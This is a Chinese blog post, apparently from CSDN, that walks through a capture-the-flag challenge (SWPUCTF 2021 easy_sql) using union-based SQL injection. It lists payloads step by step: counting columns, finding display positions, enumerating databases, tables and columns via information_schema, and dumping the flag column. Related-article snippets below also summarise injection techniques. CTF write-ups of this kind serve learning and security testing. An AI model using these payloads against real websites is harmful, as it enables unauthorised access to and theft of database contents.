SQL注入学习

已于 2023-05-12 15:35:50 修改
阅读量87 收藏
点赞数
文章标签: sql 学习 数据库
于 2023-05-12 15:08:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74035288/article/details/130642343
版权

1、使用二分法爆显位:

1' order by 位数 --+

可以得知表的列数

2、使用报错语句爆显位

-1' union select 1,2,3 --+

通过wllm=-1(eg.本题提示输入wllm的值), 一个负数不存在的id值来触发报错

可以得知有几个输出点,几个显位(本题显示有2个显位,3个输出点)

推测sql语句:

select phone,username,password from main where id='X';

3、爆数据库

-1' union select 1,2,database(); --+

4、爆数据表

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='test_db'--+

得到表名(eg.test.tb和users)

进而推测sql语句:

select phone,username,password from users where id='X';
或者
select phone,username,password from test_tb where id='X';

5、接着查看表的字段:

(将tables的字段替换成column字段)(这里查看的是test_tb的字段)

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='test_tb'--+

查看所有表的字段,直至发现flag的信息

所以现在

我们现在已经确定库名,表名,列名

因为没有特殊的要求,所以where语句就没有必要出现

直接查询

构造payload:

-1' union select 1,2,group_concat(id,flag) from test_tb --+

例题NSSCTF​​​​​​

参考[SWPUCTF 2021 新生赛]easy_sql_Sx_zzz的博客-CSDN博客

red芯
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入详解
m0_67392811的博客
06-12 5661
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
sql注入
qq_52108058的博客
11-03 798
经过对表中字段的查询发现,该admin表有三个字段,id、username、password。发现有一个admin用户,在通过limit 1,1查询第二用户为空,则只有一个用户。(可以理解为从数据库提取的数据被显示在前端)可以在第二个字段处显示我们想要的内容。发现的第二个字段处为。
SQL注入中的显示
weixin_43379478的博客
12-10 3793
我们在进行手工SQL注入的时候会用到ORDER BY 查询列数,然后通过UNION SELECT爆出在网页中的显示。这个显示指的是网页中能够显示数据的置。 举例来说,比如我们通过ORDER BY命令知道了表的列数为11。然后再使用UNION SELECT 1,2,3…,11 from table,网页中显示了信息8,那么说明网页只能够显示第8列中信息,不能显示其他列的信息。所以如果我们想要知...
SQL注入点】注入点出现置、判断、编码、利用
07-01 5387
SQL-注入点】
简单SQL注入实验
qq_43518594的博客
10-30 3242
一、什么是SQL注入 SQL攻击(英语:SQL injection),简称注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 二、SQL注入原理 一般情况下,用户登录的SQL语句为select * from users where user=$username and pw=$password ;这里的username和password分别
sql注入学习入门篇
12-16
SQL注入学习入门篇 SQL注入是一种常见的网络攻击手段,它能够让攻击者获取到网站的敏感信息,从而导致严重的安全隐患。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
SQL 注入天书.pdf
08-06
SQL 注入学习天书
sql注入学习进阶篇
12-16
sql注入学习进阶篇
SQL注入总结(一)
qq_43233085的博客
11-14 1239
科普基础 | 这可能是最全的SQL注入总结(一)SQL注入原理SQL注入的分类MySQL与MSSQL及ACCESS之间的区别判断三种数据库的语句基本手工注入流程报错注入报错注入延时盲注多语句注入内联注入 SQL注入原理 当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。 攻击者通过构造不同的sql语句来实现对数据库的任意操作。 SQL注入的分类 按变量类型分:数字型和字符型 按H...
SQL注入-有回显的注入
渗透笔记
01-12 6492
1.MySQL相关 在MySQL 5+版本后,加入了information_schema这个库,该库存放了所有数据库的信息 information_schema.columns包含所有表的字段 字段 table_schema 数据库名 table_name 表名 column_name
简单sql注入超详细原理
qq_45951598的博客
10-01 2698
一、手工注入 我们这边搭建的环境是sqli-labs-master。 链接:https://github.com/Audi-1/sqli-labs 安装: 首先安装phpstudy或者xampp 将下载的文件解压发在:phpstudy的WWW文件夹里 或者 xampp里面的htdocs文件夹里面 修改mysql文件的账号密码 在sqli-labs-master\sql-connections里面有个db-creds.inc文件,打开并修改账号密码。 点击第一个:Setup/reset Database
封神台SQL注入-显错注入
qq_40941912的博客
08-23 1430
一、原理 判断注入点 判断当前页面字段总数 判断显示 查当前数据库 查表名 查列名 查字段内容 Mysql在5.0以上版本加入了 information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等 information_schema.tables 存放表名和库名的对应 information_schema.columns 存放字段名和表名的对应 [注: information_schema.tables
SQL注入详解
qq_48904485的博客
03-21 2万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠查询、联合查询 、二次注入等等
SQL注入基础-易错问题汇总
weixin_30606461的博客
08-02 604
SQL注入基础-易错问题汇总 1.sql注入本质是什么 把用户输入当做代码执行 2.sql注入的条件 用户可控输入和原本程序要执行代码,拼接用户输入且当作SQL语句去执行 3.order by的作用及含义 order by 用于判断显示,order by 原有的作用是对字段进行一个排序,在sql注入中用order by 来判断排序,order by 1就是对一个字段...
SQL注入-联合查询
weixin_51706044的博客
02-05 1639
文章目录前言一、判断注入点还是整形或字符型二、判断列数三.找到显示四.获取库名五.获取表名六.获取列名七.获取字段信息总结 前言 联合查询: 一:按照注入语法分为:联合查询注入Union/报错查询注入error/布尔型注入Boolean/延时注入Time/堆叠查询注入 二:联合查询注入是最简单的一种注入方式,但是要求页面必须有显示.否则无法注入. 显示:可以理解为从数据库提取的数据被显示在前端. 如果没有显示,我们无法查看注入的结果. 三:联合查询一般步骤: 1、判断注入点还是整形或字符型 2、判
SQL注入之联合查询注入
热门推荐
selecthch的博客
06-07 4万+
联合查询注入利用的前提前提条件:页面上有显示什么是显示?在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的置就叫显示联合注入的过程1、判断注入点2、判断是整型还是字符型3、判断查询列数4、判断显示5、获取所有数据库名6、获取数据库(test)所有表名7、获取(数据库:test,表:admin)中所有字段名8、获取字段中的数据一、...
PostgreSQL源码分析——绑定变量
最新发布
让我思考一下
06-18 43
这里分析一下函数中应用绑定变量的问题,但实际应用场景中,不推荐这么使用。
SQL注入学习对我们有什么作用
06-12
SQL注入是一种常见的网络攻击方式,它利用Web应用程序的漏洞,向数据库中注入恶意代码,从而实现未经授权的访问或操作数据库的目的。学习SQL注入对我们有以下作用: 1. 提高安全意识:学习SQL注入可以帮助我们了解Web应用程序的安全漏洞,提高我们的安全意识,从而更好地保护自己的网络安全。 2. 发现Web应用程序漏洞:学习SQL注入可以帮助我们发现Web应用程序的漏洞,从而及时采取措施进行修复,保护Web应用程序的安全。 3. 提高渗透测试技能:学习SQL注入可以帮助我们掌握渗透测试的技能,进一步提高我们的渗透测试水平和攻击能力。 4. 学习SQL语言:学习SQL注入需要掌握SQL语言的基本语法和操作方法,这有助于我们更好地理解和应用SQL语言。 总之,学习SQL注入对于我们提高安全意识、发现Web应用程序漏洞、提高渗透测试技能、学习SQL语言等方面都非常有用,可以帮助我们更好地保护自己的网络安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值